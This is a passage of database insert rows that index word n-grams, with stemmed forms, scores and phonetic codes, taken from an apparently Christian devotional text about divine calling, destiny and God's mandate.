(250369, 'and fulfill you', 'and fulfill you', 0, 1, 1.5, 'A531414', 2, '*'),
(250370, 'and harnessed', 'and harnessed', 0, 1, 1.4333, 'A536523', 2, '*'),
(250371, 'and harnessed in', 'and harnessed in', 0, 1, 1.5333, 'A5365235', 2, '*'),
(250372, 'and jack', 'and jack', 0, 1, 1.2667, 'A532', 2, '*'),
(250373, 'and jack up', 'and jack up', 0, 1, 1.3667, 'A5321', 2, '*'),
(250374, 'and make them', 'and make them', 0, 1, 1.4333, 'A535235', 2, '*'),
(250375, 'and mandate', 'and mandate', 0, 1, 1.3667, 'A5353', 2, '*'),
(250376, 'and mandate of', 'and mandate of', 0, 1, 1.4667, 'A53531', 2, '*'),
(250377, 'and terrifies', 'and terrifies', 0, 1, 1.4333, 'A53612', 2, '*'),
(250378, 'and terrifies the', 'and terrifies the', 0, 1, 1.5667, 'A536123', 2, '*'),
(250379, 'and you need', 'and you need', 0, 1, 1.4, 'A5353', 2, '*'),
(250380, 'are called', 'ar called', 0, 1, 1.3333, 'A6243', 2, '*'),
(250381, 'are called they', 'ar called they', 0, 1, 1.5, 'A6243', 2, '*'),
(250382, 'are living at', 'ar living at', 0, 1, 1.4333, 'A641523', 2, '*'),
(250383, 'are living lower', 'ar living lower', 0, 1, 1.5333, 'A6415246', 2, '*'),
(250384, 'are not being', 'ar not being', 0, 1, 1.4333, 'A653152', 2, '*'),
(250385, 'are only untouchable', 'ar only untouchable', 0, 1, 1.6667, 'A65453214', 2, '*'),
(250386, 'are privileged', 'ar privileged', 0, 1, 1.4667, 'A6161423', 2, '*'),
(250387, 'are privileged of', 'ar privileged of', 0, 1, 1.5667, 'A61614231', 2, '*'),
(250388, 'are two names', 'ar two names', 0, 1, 1.4333, 'A6352', 2, '*'),
(250389, 'at convenience', 'at convenience', 0, 1, 1.4667, 'A325152', 2, '*'),
(250390, 'at convenience level', 'at convenience level', 0, 1, 1.6667, 'A325152414', 2, '*'),
(250391, 'background', 'background', 0, 0, 0.6667, 'B2653', 2, '*'),
(250392, 'background 2', 'background 2', 0, 1, 1.4, 'B2653', 2, '*'),
(250393, 'background 2 the', 'background 2 the', 0, 1, 1.5333, 'B2653', 2, '*'),
(250394, 'batter', 'batter', 0, 0, 0.4, 'B360', 2, '*'),
(250395, 'batter people', 'batter people', 0, 1, 1.4333, 'B3614', 2, '*'),
(250396, 'batter people and', 'batter people and', 0, 1, 1.5667, 'B361453', 2, '*'),
(250397, 'be trained', 'be trained', 0, 1, 1.3333, 'B3653', 2, '*'),
(250398, 'be trained for', 'be trained for', 0, 1, 1.4667, 'B365316', 2, '*'),
(250399, 'bears 1', 'bear 1', 0, 1, 1.2333, 'B620', 2, '*'),
(250400, 'bears 1 the', 'bear 1 the', 0, 1, 1.3667, 'B623', 2, '*'),
(250401, 'before they', 'befor they', 0, 1, 1.3667, 'B630', 2, '*'),
(250402, 'before they discover', 'befor they discover', 0, 1, 1.6667, 'B63216', 2, '*'),
(250403, 'being driven', 'be driven', 0, 1, 1.4, 'B523615', 2, '*'),
(250404, 'being driven and', 'be driven and', 0, 1, 1.5333, 'B5236153', 2, '*'),
(250405, 'believers are living', 'believ are living', 0, 1, 1.6667, 'B416264152', 2, '*'),
(250406, 'beloved live', 'belov live', 0, 1, 1.4, 'B41341', 2, '*'),
(250407, 'beloved live up', 'belov live up', 0, 1, 1.5, 'B41341', 2, '*'),
(250408, 'beloved the devil', 'belov the devil', 0, 1, 1.5667, 'B41314', 2, '*'),
(250409, 'birth circumstances', 'birth circumstances', 0, 1, 1.6333, 'B6326252352', 2, '*'),
(250410, 'birth circumstances problems', 'birth circumstances problems', 0, 1, 1.9333, 'B6326252352161452', 2, '*'),
(250411, 'but have', 'but have', 0, 1, 1.2667, 'B310', 2, '*'),
(250412, 'but have however', 'but have however', 0, 1, 1.5333, 'B316', 2, '*'),
(250413, 'by it', 'by it', 0, 1, 1.1667, 'B300', 2, '*'),
(250414, 'by it heaven', 'by it heaven', 0, 1, 1.4, 'B315', 2, '*'),
(250415, 'by virtue', 'by virtue', 0, 1, 1.3, 'B630', 2, '*'),
(250416, 'by virtue of', 'by virtue of', 0, 1, 1.4, 'B631', 2, '*'),
(250417, 'call and', 'call and', 0, 1, 1.2667, 'C453', 2, '*'),
(250418, 'call and mandate', 'call and mandate', 0, 1, 1.5333, 'C45353', 2, '*'),
(250419, 'call and you', 'call and you', 0, 1, 1.4, 'C453', 2, '*'),
(250420, 'call but', 'call but', 0, 1, 1.2667, 'C413', 2, '*'),
(250421, 'call but have', 'call but have', 0, 1, 1.4333, 'C4131', 2, '*'),
(250422, 'call for you', 'call for you', 0, 1, 1.4, 'C416', 2, '*'),
(250423, 'call of', 'call of', 0, 1, 1.2333, 'C410', 2, '*'),
(250424, 'call of god', 'call of god', 0, 1, 1.3667, 'C4123', 2, '*'),
(250425, 'call over', 'call over', 0, 1, 1.3, 'C416', 2, '*'),
(250426, 'call over your', 'call over your', 0, 1, 1.4667, 'C416', 2, '*'),
(250427, 'call you by', 'call you by', 0, 1, 1.3667, 'C410', 2, '*'),
(250428, 'called they', 'call they', 0, 1, 1.3667, 'C430', 2, '*'),
(250429, 'called they have', 'call they have', 0, 1, 1.5333, 'C431', 2, '*'),
(250430, 'called you that', 'call you that', 0, 1, 1.5, 'C430', 2, '*'),
(250431, 'calling don\'t', 'call don', 0, 1, 1.4333, 'C452353', 2, '*'),
(250432, 'calling don\'t continue', 'call don continue', 0, 1, 1.7333, 'C4523532535', 2, '*'),
(250433, 'calling raise', 'call raise', 0, 1, 1.4333, 'C45262', 2, '*'),
(250434, 'calling raise your', 'call raise your', 0, 1, 1.6, 'C452626', 2, '*'),
(250435, 'calling that', 'call that', 0, 1, 1.4, 'C4523', 2, '*'),
(250436, 'calling that silences', 'call that silences', 0, 1, 1.7, 'C45232452', 2, '*'),
(250437, 'calling therefore', 'call therefore', 0, 1, 1.5667, 'C4523616', 2, '*'),
(250438, 'calling therefore embrace', 'call therefore embrace', 0, 1, 1.8333, 'C45236165162', 2, '*'),
(250439, 'capacity that', 'capac that', 0, 1, 1.4333, 'C123', 4, '*'),
(250440, 'capacity that god', 'capac that god', 0, 1, 1.5667, 'C12323', 3, '*'),
(250441, 'chosen to', 'chosen to', 0, 1, 1.3, 'C530', 2, '*'),
(250442, 'chosen to stay', 'chosen to stay', 0, 1, 1.4667, 'C5323', 2, '*'),
(250443, 'circumstances problems', 'circumst problems', 0, 1, 1.7333, 'C6252352161452', 2, '*'),
(250444, 'circumstances problems or', 'circumst problems or', 0, 1, 1.8333, 'C62523521614526', 2, '*'),
(250445, 'come face-to-face', 'come face-to-face', 0, 1, 1.5667, 'C512312', 2, '*'),
(250446, 'come face-to-face with', 'come face-to-face with', 0, 1, 1.7333, 'C5123123', 2, '*'),
(250447, 'continue living', 'continu living', 0, 1, 1.5, 'C5354152', 2, '*'),
(250448, 'continue living at', 'continu living at', 0, 1, 1.6, 'C53541523', 2, '*'),
(250449, 'convenience', 'conveni', 0, 0, 0.7333, 'C5152', 3, '*'),
(250450, 'convenience jack', 'conveni jack', 0, 1, 1.5333, 'C5152', 2, '*'),
(250451, 'convenience jack up', 'conveni jack up', 0, 1, 1.6333, 'C51521', 2, '*'),
(250452, 'convenience level', 'conveni level', 0, 1, 1.5667, 'C5152414', 2, '*'),
(250453, 'convenience level where', 'conveni level where', 0, 1, 1.7667, 'C51524146', 2, '*'),
(250454, 'dearly beloved live', 'dearli beloved live', 0, 1, 1.6333, 'D64141341', 2, '*'),
(250455, 'destiny and calling', 'destini and calling', 0, 1, 1.6333, 'D23532452', 2, '*'),
(250456, 'destiny before', 'destini before', 0, 1, 1.4667, 'D23516', 2, '*'),
(250457, 'destiny before they', 'destini before they', 0, 1, 1.6333, 'D235163', 2, '*'),
(250458, 'destiny that', 'destini that', 0, 1, 1.4, 'D2353', 2, '*'),
(250459, 'destiny that god', 'destini that god', 0, 1, 1.5333, 'D235323', 2, '*'),
(250460, 'devil only', 'devil only', 0, 1, 1.3333, 'D1454', 2, '*'),
(250461, 'devil only recognizes', 'devil only recognizes', 0, 1, 1.7, 'D14546252', 2, '*'),
(250462, 'disappoint till', 'disappoint till', 0, 1, 1.5, 'D21534', 2, '*'),
(250463, 'disappoint till next', 'disappoint till next', 0, 1, 1.6667, 'D21534523', 2, '*'),
(250464, 'discover', 'discov', 0, 0, 0.5333, 'D216', 2, '*'),
(250465, 'discover and', 'discov and', 0, 1, 1.4, 'D21653', 2, '*'),
(250466, 'discover and fulfill', 'discov and fulfill', 0, 1, 1.6667, 'D216531414', 2, '*'),
(250467, 'discover however', 'discov however', 0, 1, 1.5333, 'D21616', 2, '*'),
(250468, 'discover however you', 'discov however you', 0, 1, 1.6667, 'D21616', 2, '*'),
(250469, 'discover that', 'discov that', 0, 1, 1.4333, 'D2163', 2, '*'),
(250470, 'discover that name', 'discov that name', 0, 1, 1.6, 'D21635', 2, '*'),
(250471, 'divine call and', 'divin call and', 0, 1, 1.5, 'D152453', 2, '*'),
(250472, 'divine mandate', 'divin mandate', 0, 1, 1.4667, 'D153', 2, '*'),
(250473, 'don\'t continue', 'don continue', 0, 1, 1.4667, 'D532535', 2, '*'),
(250474, 'don\'t continue living', 'don continue living', 0, 1, 1.7, 'D5325354152', 2, '*'),
(250475, 'driven and', 'driven and', 0, 1, 1.3333, 'D6153', 2, '*'),
(250476, 'driven and harnessed', 'driven and harnessed', 0, 1, 1.6667, 'D61536523', 2, '*'),
(250477, 'embrace it and', 'embrac it and', 0, 1, 1.4667, 'E5162353', 2, '*'),
(250478, 'enemy that', 'enemi that', 0, 1, 1.3333, 'E530', 2, '*'),
(250479, 'enemy that is', 'enemi that is', 0, 1, 1.4333, 'E532', 2, '*'),
(250480, 'enemy when', 'enemi when', 0, 1, 1.3333, 'E500', 2, '*'),
(250481, 'enemy when you', 'enemi when you', 0, 1, 1.4667, 'E500', 2, '*'),
(250482, 'eternity and', 'etern and', 0, 1, 1.4, 'E365353', 2, '*'),
(250483, 'eternity and you', 'etern and you', 0, 1, 1.5333, 'E365353', 2, '*'),
(250484, 'expectant', 'expect', 0, 0, 0.6, 'E212353', 2, '*'),
(250485, 'expectant over', 'expect over', 0, 1, 1.4667, 'E21235316', 2, '*'),
(250486, 'expectant over your', 'expect over your', 0, 1, 1.6333, 'E21235316', 2, '*'),
(250487, 'face-to-face', 'face-to-fac', 0, 0, 0.8, 'F2312', 2, '*'),
(250488, 'face-to-face with', 'face-to-fac with', 0, 1, 1.5667, 'F23123', 2, '*'),
(250489, 'face-to-face with the', 'face-to-fac with the', 0, 1, 1.7, 'F23123', 2, '*'),
(250490, 'father in', 'father in', 0, 1, 1.3, 'F365', 3, '*'),
(250491, 'father in eternity', 'father in eternity', 0, 1, 1.6, 'F3653653', 2, '*'),
(250492, 'father\'s heart 7', 'father heart 7', 0, 1, 1.5333, 'F36263', 2, '*'),
(250493, 'for destiny', 'for destiny', 0, 1, 1.3667, 'F63235', 2, '*'),
(250494, 'for destiny before', 'for destiny before', 0, 1, 1.6, 'F6323516', 2, '*'),
(250495, 'for when', 'for when', 0, 1, 1.2667, 'F650', 2, '*'),
(250496, 'for when you', 'for when you', 0, 1, 1.4, 'F650', 2, '*'),
(250497, 'for you there', 'for you there', 0, 1, 1.4333, 'F636', 2, '*'),
(250498, 'fulfill you', 'fulfil you', 0, 1, 1.3667, 'F414', 2, '*'),
(250499, 'fulfill you must', 'fulfil you must', 0, 1, 1.5333, 'F414523', 2, '*'),
(250500, 'give account', 'give account', 0, 1, 1.4, 'G1253', 2, '*'),
(250501, 'give account for', 'give account for', 0, 1, 1.5333, 'G125316', 2, '*'),
(250502, 'god to be', 'god to be', 0, 1, 1.3, 'G310', 2, '*'),
(250503, 'god upon', 'god upon', 0, 1, 1.2667, 'G315', 2, '*'),
(250504, 'god upon their', 'god upon their', 0, 1, 1.4667, 'G31536', 2, '*'),
(250505, 'god\'s call over', 'god call over', 0, 1, 1.5, 'G32416', 2, '*'),
(250506, 'god\'s mandate', 'god mandate', 0, 1, 1.4333, 'G3253', 2, '*'),
(250507, 'god\'s mandate over', 'god mandate over', 0, 1, 1.6, 'G325316', 2, '*'),
(250508, 'harnessed', 'har', 0, 0, 0.6, 'H6523', 2, '*'),
(250509, 'harnessed in', 'har in', 0, 1, 1.4, 'H65235', 2, '*'),
(250510, 'harnessed in accordance', 'har in accordance', 0, 1, 1.7667, 'H6523526352', 2, '*'),
(250511, 'has placed within', 'ha placed within', 0, 1, 1.5667, 'H214235', 2, '*'),
(250512, 'have a sense', 'have a sense', 0, 1, 1.4, 'H1252', 2, '*'),
(250513, 'have however', 'have however', 0, 1, 1.4, 'H160', 2, '*'),
(250514, 'have however chosen', 'have however chosen', 0, 1, 1.6333, 'H1625', 2, '*'),
(250515, 'he tries', 'he tries', 0, 1, 1.2667, 'H362', 2, '*'),
(250516, 'he tries to', 'he tries to', 0, 1, 1.3667, 'H3623', 2, '*'),
(250517, 'heart 7', 'heart 7', 0, 1, 1.2333, 'H630', 2, '*'),
(250518, 'heart 7 05', 'heart 7 05', 0, 1, 1.3333, 'H630', 2, '*'),
(250519, 'heaven is expectant', 'heaven is expectant', 0, 1, 1.6333, 'H15212353', 2, '*'),
(250520, 'heaven over', 'heaven over', 0, 1, 1.3667, 'H1516', 4, '*'),
(250521, 'heaven over your', 'heaven over your', 0, 1, 1.5333, 'H1516', 2, '*'),
(250522, 'however chosen', 'howev chosen', 0, 1, 1.4667, 'H1625', 2, '*'),
(250523, 'however chosen to', 'howev chosen to', 0, 1, 1.5667, 'H16253', 2, '*'),
(250524, 'however you', 'howev you', 0, 1, 1.3667, 'H160', 2, '*'),
(250525, 'however you are', 'howev you are', 0, 1, 1.5, 'H160', 2, '*'),
(250526, 'in accordance with', 'in accordance with', 0, 1, 1.6, 'I5263523', 2, '*'),
(250527, 'in eternity and', 'in eternity and', 0, 1, 1.5, 'I5365353', 2, '*'),
(250528, 'in the call', 'in the call', 0, 1, 1.3667, 'I5324', 2, '*'),
(250529, 'in the calling', 'in the calling', 0, 1, 1.4667, 'I532452', 2, '*'),
(250530, 'is a divine', 'is a divine', 0, 1, 1.3667, 'I2315', 2, '*'),
(250531, 'is expectant', 'is expectant', 0, 1, 1.4, 'I212353', 2, '*'),
(250532, 'is expectant over', 'is expectant over', 0, 1, 1.5667, 'I21235316', 2, '*'),
(250533, 'is the name', 'is the name', 0, 1, 1.3667, 'I235', 2, '*'),
(250534, 'is why he', 'is why he', 0, 1, 1.3, 'I200', 2, '*'),
(250535, 'is your active', 'is your active', 0, 1, 1.4667, 'I26231', 2, '*'),
(250536, 'it and jack', 'it and jack', 0, 1, 1.3667, 'I3532', 2, '*'),
(250537, 'it heaven', 'it heaven', 0, 1, 1.3, 'I315', 2, '*'),
(250538, 'it heaven is', 'it heaven is', 0, 1, 1.4, 'I3152', 2, '*'),
(250539, 'it or not', 'it or not', 0, 1, 1.3, 'I3653', 2, '*'),
(250542, 'jack', 'jack', 0, 0, 0.2667, 'J000', 2, '*'),
(250543, 'jack up', 'jack up', 0, 1, 1.2333, 'J100', 2, '*'),
(250544, 'jack up your', 'jack up your', 0, 1, 1.4, 'J160', 2, '*'),
(250546, 'know they', 'know they', 0, 1, 1.3, 'K530', 2, '*'),
(250547, 'know they are', 'know they are', 0, 1, 1.4333, 'K536', 2, '*'),
(250548, 'level of god\'s', 'level of god', 0, 1, 1.4667, 'L141232', 2, '*'),
(250549, 'level of that', 'level of that', 0, 1, 1.4333, 'L1413', 2, '*'),
(250550, 'level where', 'level where', 0, 1, 1.3667, 'L146', 2, '*'),
(250551, 'level where their', 'level where their', 0, 1, 1.5667, 'L14636', 2, '*'),
(250552, 'life that you', 'life that you', 0, 1, 1.4333, 'L130', 2, '*'),
(250553, 'life to the', 'life to the', 0, 1, 1.3667, 'L130', 2, '*'),
(250554, 'life whether', 'life whether', 0, 1, 1.4, 'L136', 2, '*'),
(250555, 'life whether you', 'life whether you', 0, 1, 1.5333, 'L136', 2, '*'),
(250556, 'like it', 'like it', 0, 1, 1.2333, 'L230', 2, '*'),
(250557, 'like it or', 'like it or', 0, 1, 1.3333, 'L236', 2, '*'),
(250558, 'live by it', 'live by it', 0, 1, 1.3333, 'L130', 2, '*'),
(250559, 'live up', 'live up', 0, 1, 1.2333, 'L100', 2, '*'),
(250560, 'live up to', 'live up to', 0, 1, 1.3333, 'L130', 2, '*'),
(250561, 'lives are', 'live are', 0, 1, 1.3, 'L126', 2, '*'),
(250562, 'lives are not', 'live are not', 0, 1, 1.4333, 'L12653', 2, '*'),
(250563, 'lives they know', 'live they know', 0, 1, 1.5, 'L12325', 2, '*'),
(250564, 'living at', 'live at', 0, 1, 1.3, 'L1523', 2, '*'),
(250565, 'living at the', 'live at the', 0, 1, 1.4333, 'L1523', 2, '*'),
(250566, 'living lower', 'live lower', 0, 1, 1.4, 'L15246', 2, '*'),
(250567, 'living lower than', 'live lower than', 0, 1, 1.5667, 'L1524635', 2, '*'),
(250568, 'lower', 'lower', 0, 0, 0.3333, 'L600', 2, '*'),
(250569, 'lower than', 'lower than', 0, 1, 1.3333, 'L635', 2, '*'),
(250570, 'lower than the', 'lower than the', 0, 1, 1.4667, 'L6353', 2, '*'),
(250571, 'make them unfit', 'make them unfit', 0, 1, 1.5, 'M23513', 2, '*'),
(250572, 'man bears', 'man bears', 0, 1, 1.3, 'M162', 2, '*'),
(250573, 'man bears 1', 'man bears 1', 0, 1, 1.3667, 'M162', 2, '*'),
(250574, 'mandate', 'mandat', 0, 0, 0.4667, 'M300', 3, '*'),
(250575, 'mandate of', 'mandat of', 0, 1, 1.3333, 'M310', 2, '*'),
(250576, 'mandate of heaven', 'mandat of heaven', 0, 1, 1.5667, 'M315', 2, '*'),
(250577, 'mandate over', 'mandat over', 0, 1, 1.4, 'M316', 2, '*'),
(250578, 'mandate over your', 'mandat over your', 0, 1, 1.5667, 'M316', 2, '*'),
(250579, 'many believers', 'mani believers', 0, 1, 1.4667, 'M14162', 2, '*'),
(250580, 'many believers are', 'mani believers are', 0, 1, 1.6, 'M141626', 2, '*'),
(250581, 'men call', 'men call', 0, 1, 1.2667, 'M240', 2, '*'),
(250582, 'men call you', 'men call you', 0, 1, 1.4, 'M240', 2, '*'),
(250583, 'mind to discover', 'mind to discover', 0, 1, 1.5333, 'M3216', 2, '*'),
(250584, 'must discover', 'must discover', 0, 1, 1.4333, 'M23216', 2, '*'),
(250585, 'must discover and', 'must discover and', 0, 1, 1.5667, 'M2321653', 2, '*'),
(250586, 'must give', 'must give', 0, 1, 1.3, 'M2321', 2, '*'),
(250587, 'must give account', 'must give account', 0, 1, 1.5667, 'M2321253', 2, '*'),
(250588, 'must make', 'must make', 0, 1, 1.3, 'M2352', 2, '*'),
(250589, 'must make up', 'must make up', 0, 1, 1.4, 'M23521', 2, '*'),
(250590, 'must not disappoint', 'must not disappoint', 0, 1, 1.6333, 'M23532153', 2, '*'),
(250591, 'name and live', 'name and live', 0, 1, 1.4333, 'N341', 2, '*'),
(250592, 'name men', 'name men', 0, 1, 1.2667, 'N000', 2, '*'),
(250593, 'name men call', 'name men call', 0, 1, 1.4333, 'N240', 2, '*'),
(250594, 'name you', 'name you', 0, 1, 1.2667, 'N000', 2, '*'),
(250595, 'name you must', 'name you must', 0, 1, 1.4333, 'N230', 2, '*'),
(250596, 'names a', 'name a', 0, 1, 1.2333, 'N200', 2, '*'),
(250597, 'names a man', 'name a man', 0, 1, 1.3667, 'N250', 2, '*'),
(250598, 'need to raise', 'need to raise', 0, 1, 1.4333, 'N362', 2, '*'),
(250599, 'not being', 'not being', 0, 1, 1.3, 'N3152', 2, '*'),
(250600, 'not being driven', 'not being driven', 0, 1, 1.5333, 'N31523615', 2, '*'),
(250601, 'not disappoint till', 'not disappoint till', 0, 1, 1.6333, 'N321534', 2, '*'),
(250602, 'not there', 'not there', 0, 1, 1.3, 'N360', 2, '*'),
(250603, 'not there is', 'not there is', 0, 1, 1.4, 'N362', 2, '*'),
(250604, 'of god to', 'of god to', 0, 1, 1.3, 'O123', 2, '*'),
(250605, 'of god upon', 'of god upon', 0, 1, 1.3667, 'O12315', 2, '*'),
(250606, 'of god\'s call', 'of god call', 0, 1, 1.4333, 'O12324', 2, '*'),
(250607, 'of god\'s mandate', 'of god mandate', 0, 1, 1.5333, 'O123253', 2, '*'),
(250608, 'of heaven over', 'of heaven over', 0, 1, 1.4667, 'O1516', 4, '*'),
(250609, 'of that divine', 'of that divine', 0, 1, 1.4667, 'O1315', 2, '*'),
(250610, 'of the call', 'of the call', 0, 1, 1.3667, 'O1324', 2, '*'),
(250611, 'of your birth', 'of your birth', 0, 1, 1.4333, 'O16163', 2, '*'),
(250612, 'of your calling', 'of your calling', 0, 1, 1.5, 'O162452', 2, '*'),
(250613, 'of your convenience', 'of your convenience', 0, 1, 1.6333, 'O1625152', 2, '*'),
(250614, 'only recognizes', 'onli recognizes', 0, 1, 1.5, 'O546252', 2, '*'),
(250615, 'only recognizes you', 'onli recognizes you', 0, 1, 1.6333, 'O546252', 2, '*'),
(250616, 'only untouchable', 'onli untouchable', 0, 1, 1.5333, 'O5453214', 2, '*'),
(250617, 'only untouchable to', 'onli untouchable to', 0, 1, 1.6333, 'O54532143', 2, '*'),
(250618, 'operation', 'oper', 0, 0, 0.6, 'O1635', 3, '*'),
(250619, 'operation in', 'oper in', 0, 1, 1.4, 'O1635', 2, '*'),
(250620, 'operation in the', 'oper in the', 0, 1, 1.5333, 'O16353', 2, '*'),
(250621, 'or background', 'or background', 0, 1, 1.4333, 'O612653', 2, '*'),
(250622, 'or background 2', 'or background 2', 0, 1, 1.5, 'O612653', 2, '*'),
(250623, 'or not there', 'or not there', 0, 1, 1.4, 'O6536', 2, '*'),
(250624, 'people and make', 'peopl and make', 0, 1, 1.5, 'P45352', 2, '*'),
(250625, 'placed within', 'place within', 0, 1, 1.4333, 'P4235', 2, '*'),
(250626, 'placed within them', 'place within them', 0, 1, 1.6, 'P423535', 2, '*'),
(250627, 'privileged', 'privileg', 0, 0, 0.6667, 'P61423', 2, '*'),
(250628, 'privileged of', 'privileg of', 0, 1, 1.4333, 'P614231', 2, '*'),
(250629, 'privileged of god', 'privileg of god', 0, 1, 1.5667, 'P61423123', 2, '*'),
(250630, 'problems or background', 'problem or background', 0, 1, 1.7333, 'P61452612653', 2, '*'),
(250631, 'raise your', 'rais your', 0, 1, 1.3333, 'R260', 2, '*'),
(250632, 'raise your life', 'rais your life', 0, 1, 1.5, 'R2641', 2, '*'),
(250633, 'recognizes', 'recogn', 0, 0, 0.6667, 'R252', 2, '*'),
(250634, 'recognizes you', 'recogn you', 0, 1, 1.4667, 'R252', 2, '*'),
(250635, 'recognizes you in', 'recogn you in', 0, 1, 1.5667, 'R2525', 2, '*'),
(250636, 's heart 7', 's heart 7', 0, 1, 1.3, 'S630', 2, '*'),
(250637, 'sense of the', 'sens of the', 0, 1, 1.4, 'S5213', 2, '*'),
(250638, 'silences', 'silenc', 0, 0, 0.5333, 'S452', 2, '*'),
(250639, 'silences and', 'silenc and', 0, 1, 1.4, 'S45253', 2, '*'),
(250640, 'silences and terrifies', 'silenc and terrifies', 0, 1, 1.7333, 'S45253612', 2, '*'),
(250641, 'stay at', 'stai at', 0, 1, 1.2333, 'S300', 2, '*'),
(250642, 'stay at convenience', 'stai at convenience', 0, 1, 1.6333, 'S325152', 2, '*'),
(250643, 'terrifies', 'terrifi', 0, 0, 0.6, 'T612', 2, '*'),
(250644, 'terrifies the', 'terrifi the', 0, 1, 1.4333, 'T6123', 2, '*'),
(250645, 'terrifies the enemy', 'terrifi the enemy', 0, 1, 1.6333, 'T61235', 2, '*'),
(250646, 'than the call', 'than the call', 0, 1, 1.4333, 'T5324', 2, '*'),
(250647, 'that divine', 'that divine', 0, 1, 1.3667, 'T150', 3, '*'),
(250648, 'that divine mandate', 'that divine mandate', 0, 1, 1.6333, 'T153', 2, '*'),
(250649, 'that is why', 'that is why', 0, 1, 1.3667, 'T200', 2, '*'),
(250650, 'that name', 'that name', 0, 1, 1.3, 'T500', 2, '*'),
(250651, 'that name and', 'that name and', 0, 1, 1.4333, 'T530', 2, '*'),
(250652, 'that silences', 'that silences', 0, 1, 1.4333, 'T2452', 2, '*'),
(250653, 'that silences and', 'that silences and', 0, 1, 1.5667, 'T245253', 2, '*'),
(250654, 'the call and', 'the call and', 0, 1, 1.4, 'T2453', 2, '*'),
(250655, 'the call but', 'the call but', 0, 1, 1.4, 'T2413', 2, '*'),
(250656, 'the call of', 'the call of', 0, 1, 1.3667, 'T241', 2, '*'),
(250657, 'the calling that', 'the calling that', 0, 1, 1.5333, 'T24523', 2, '*'),
(250658, 'the capacity that', 'the capacity that', 0, 1, 1.5667, 'T2123', 2, '*'),
(250659, 'the devil only', 'the devil only', 0, 1, 1.4667, 'T1454', 2, '*'),
(250660, 'the enemy that', 'the enemy that', 0, 1, 1.4667, 'T530', 2, '*'),
(250661, 'the enemy when', 'the enemy when', 0, 1, 1.4667, 'T500', 2, '*'),
(250662, 'the father in', 'the father in', 0, 1, 1.4333, 'T1365', 3, '*'),
(250663, 'the name men', 'the name men', 0, 1, 1.4, 'T500', 2, '*'),
(250664, 'the name you', 'the name you', 0, 1, 1.4, 'T500', 2, '*'),
(250665, 'their lives are', 'their lives are', 0, 1, 1.5, 'T64126', 2, '*'),
(250666, 'them beloved', 'them beloved', 0, 1, 1.4, 'T51413', 2, '*'),
(250667, 'them beloved the', 'them beloved the', 0, 1, 1.5333, 'T51413', 2, '*'),
(250668, 'them unfit', 'them unfit', 0, 1, 1.3333, 'T513', 2, '*'),
(250669, 'them unfit for', 'them unfit for', 0, 1, 1.4667, 'T51316', 2, '*'),
(250670, 'therefore embrace', 'therefor embrace', 0, 1, 1.5667, 'T6165162', 2, '*'),
(250671, 'therefore embrace it', 'therefor embrace it', 0, 1, 1.6667, 'T61651623', 2, '*'),
(250672, 'they are called', 'thei are called', 0, 1, 1.5, 'T6243', 2, '*'),
(250673, 'they discover', 'thei discover', 0, 1, 1.4333, 'T216', 2, '*'),
(250674, 'they discover however', 'thei discover however', 0, 1, 1.7, 'T21616', 2, '*'),
(250675, 'they have a', 'thei have a', 0, 1, 1.3667, 'T100', 2, '*'),
(250676, 'they know they', 'thei know they', 0, 1, 1.4667, 'T253', 2, '*'),
(250677, 'to batter', 'to batter', 0, 1, 1.3, 'T136', 2, '*'),
(250678, 'to batter people', 'to batter people', 0, 1, 1.5333, 'T13614', 2, '*'),
(250679, 'to be trained', 'to be trained', 0, 1, 1.4333, 'T13653', 2, '*'),
(250680, 'to discover', 'to discover', 0, 1, 1.3667, 'T216', 2, '*'),
(250681, 'to discover that', 'to discover that', 0, 1, 1.5333, 'T2163', 2, '*'),
(250682, 'to raise', 'to raise', 0, 1, 1.2667, 'T620', 4, '*'),
(250683, 'to raise your', 'to raise your', 0, 1, 1.4333, 'T626', 2, '*'),
(250684, 'to stay at', 'to stay at', 0, 1, 1.3333, 'T230', 2, '*'),
(250685, 'to the level', 'to the level', 0, 1, 1.4, 'T414', 2, '*'),
(250686, 'to your calling', 'to your calling', 0, 1, 1.5, 'T62452', 2, '*'),
(250687, 'trained', 'train', 0, 0, 0.4667, 'T653', 2, '*'),
(250688, 'trained for', 'train for', 0, 1, 1.3667, 'T65316', 2, '*'),
(250689, 'trained for your', 'train for your', 0, 1, 1.5333, 'T65316', 2, '*'),
(250690, 'tries', 'tri', 0, 0, 0.3333, 'T620', 2, '*'),
(250691, 'tries to', 'tri to', 0, 1, 1.2667, 'T623', 2, '*'),
(250692, 'tries to batter', 'tri to batter', 0, 1, 1.5, 'T623136', 2, '*'),
(250693, 'two names', 'two names', 0, 1, 1.3, 'T520', 2, '*'),
(250694, 'two names a', 'two names a', 0, 1, 1.3667, 'T520', 2, '*'),
(250695, 'unfit for', 'unfit for', 0, 1, 1.3, 'U51316', 2, '*'),
(250696, 'unfit for destiny', 'unfit for destiny', 0, 1, 1.5667, 'U513163235', 2, '*'),
(250697, 'untouchable', 'untouch', 0, 0, 0.7333, 'U53214', 2, '*'),
(250698, 'untouchable to', 'untouch to', 0, 1, 1.4667, 'U532143', 2, '*'),
(250699, 'untouchable to the', 'untouch to the', 0, 1, 1.6, 'U532143', 2, '*'),
(250700, 'up to your', 'up to your', 0, 1, 1.3333, 'U136', 2, '*'),
(250701, 'up your life', 'up your life', 0, 1, 1.4, 'U1641', 2, '*'),
(250702, 'upon their', 'upon their', 0, 1, 1.3333, 'U1536', 2, '*'),
(250703, 'upon their lives', 'upon their lives', 0, 1, 1.5333, 'U1536412', 2, '*'),
(250704, 'virtue', 'virtu', 0, 0, 0.4, 'V630', 2, '*'),
(250705, 'virtue of', 'virtu of', 0, 1, 1.3, 'V631', 2, '*'),
(250706, 'virtue of your', 'virtu of your', 0, 1, 1.4667, 'V6316', 2, '*'),
(250707, 'where their', 'where their', 0, 1, 1.3667, 'W636', 2, '*'),
(250708, 'where their lives', 'where their lives', 0, 1, 1.5667, 'W636412', 2, '*'),
(250709, 'whether you like', 'whether you like', 0, 1, 1.5333, 'W3642', 2, '*'),
(250710, 'why he', 'why he', 0, 1, 1.2, 'W000', 3, '*'),
(250711, 'why he tries', 'why he tries', 0, 1, 1.4, 'W362', 2, '*'),
(250712, 'with the capacity', 'with the capacity', 0, 1, 1.5667, 'W32123', 2, '*'),
(250713, 'within them', 'within them', 0, 1, 1.3667, 'W3535', 2, '*'),
(250714, 'within them beloved', 'within them beloved', 0, 1, 1.6333, 'W35351413', 2, '*'),
(250715, 'you are living', 'you are living', 0, 1, 1.4667, 'Y64152', 2, '*'),
(250716, 'you are only', 'you are only', 0, 1, 1.4, 'Y654', 3, '*'),
